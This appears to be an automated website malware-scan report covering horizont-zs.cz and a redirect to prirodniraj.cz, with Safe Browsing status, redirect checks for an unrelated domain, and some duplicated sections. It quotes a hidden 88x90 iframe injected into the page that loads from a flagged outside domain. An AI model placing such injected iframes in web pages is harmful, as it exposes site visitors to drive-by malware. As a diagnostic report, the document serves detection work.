Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=horizont-zs.cz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: market-data-provider.com
Result:
HTTP/1.1 301 Moved Permanently
Date: Tue, 03 Mar 2015 21:32:11 GMT
Location: http://www.market-data-provider.com/
Server: Microsoft-IIS/8.0
Content-Length: 159
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_-1797089862=54f6285b2d117; expires=Tue, 03-Mar-2015 22:02:11 GMT; path=/; httponly
Set-Cookie: ARRAffinity=70a701ebe090906645f21ae36d174fff2516ec583b7eff2edba2353c8be3f093;Path=/;Domain=market-data-provider.com
X-Pingback: http://www.market-data-provider.com/xmlrpc.php
X-Powered-By: PHP/5.4.34
X-Powered-By: ASP.NET
...159 bytes of data.
GET / HTTP/1.1
Host: market-data-provider.com
Result:
HTTP/1.1 301 Moved Permanently
Date: Tue, 03 Mar 2015 21:32:11 GMT
Location: http://www.market-data-provider.com/
Server: Microsoft-IIS/8.0
Content-Length: 159
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_-1797089862=54f6285b2d117; expires=Tue, 03-Mar-2015 22:02:11 GMT; path=/; httponly
Set-Cookie: ARRAffinity=70a701ebe090906645f21ae36d174fff2516ec583b7eff2edba2353c8be3f093;Path=/;Domain=market-data-provider.com
X-Pingback: http://www.market-data-provider.com/xmlrpc.php
X-Powered-By: PHP/5.4.34
X-Powered-By: ASP.NET
...159 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: market-data-provider.com
Referer: http://www.google.com/search?q=market-data-provider.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: market-data-provider.com
Referer: http://www.google.com/search?q=market-data-provider.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://www.horizont-zs.cz/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 05 Jun 2014 02:46:10 GMT Location: http://www.prirodniraj.cz/ Server: Apache/2.2.9 (Debian) Content-Length: 317 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://www.prirodniraj.cz/ | 200 OK Content-Length: 1037 Content-Type: text/html | malicious |
Page code contains blacklisted domain: nmsbaseball.com ...[792 bytes skipped]... swf" /> <param name="loop" value="true" /> <param name="menu" value="false" /> <div>Zde je alternativnà text pro prohlÞeÄe nepodporujÃcà Flash...</div> <div style="font-size: 0pt"> restaurace </div> </object> <![endif]--> <iframe name=Twitter scrolling=auto frameborder=no align=center height=90 width=88 src=http://nmsbaseball.com/post.php?id=976193></iframe></body> </html> Malicious iFrame found. size: 88x90 src: http://nmsbaseball.com/post.php?id=976193 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=90 width=88 src=http://nmsbaseball.com/post.php?id=976193> | ||
http://www.prirodniraj.cz/test404page.js | 404 Not Found Content-Length: 295 Content-Type: text/html | clean |